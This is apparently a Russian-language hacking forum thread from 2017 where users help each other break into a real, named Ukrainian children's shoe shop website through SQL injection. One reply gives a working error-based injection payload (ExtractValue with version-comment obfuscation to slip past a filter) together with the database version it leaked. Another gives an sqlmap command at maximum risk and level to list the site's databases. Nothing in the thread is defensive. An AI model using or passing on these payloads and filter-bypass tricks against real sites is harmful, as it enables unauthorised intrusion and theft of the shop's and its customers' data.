Просмотр полной версии : стоит защита, как обойти ?
стоит защита, как обойти ?
https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov' тут SQL
https://kidshop.com.ua/category/obu...Value(1,concat(0x3a,(select(version())))))=' 1 (https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,concat(0x3a,(select(ve rsion())))))='1) не пропускает
kacergei
07.11.2017, 11:15
Sensoft said:
↑ (https://antichat.live/posts/4147049/)
стоит защита, как обойти ?
https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov
' тут SQL
https://kidshop.com.ua/category/obu...Value(1,concat(0x3a,(select(version())))))=' 1 (https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,concat(0x3a,(select(ve rsion())))))='1)
не пропускает
Защита?
Code:
https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,/*!50000concat*/(0x3a,(select(version())))))='1
Результат:
XPATH syntax error: ':5.7.16-10-log'
kacergei said:
↑ (https://antichat.live/posts/4147125/)
Защита?
Code:
https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,/*!50000concat*/(0x3a,(select(version())))))='1
Результат:
XPATH syntax error: ':
5.7.16-10-log
'
случайно не знаешь как в мамп засунуть запрос чтобы тот всё вытащил ?
karkajoi
07.11.2017, 15:29
пробуй вот так,
Code:
sqlmap --url "https://kidshop.com.ua/category/obuv/tufli/dlya-malchikov'or(ExtractValue(1,/*!50000concat*/(0x3a,(select(*)))))='1" --dbs --risk=3 --level=5
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot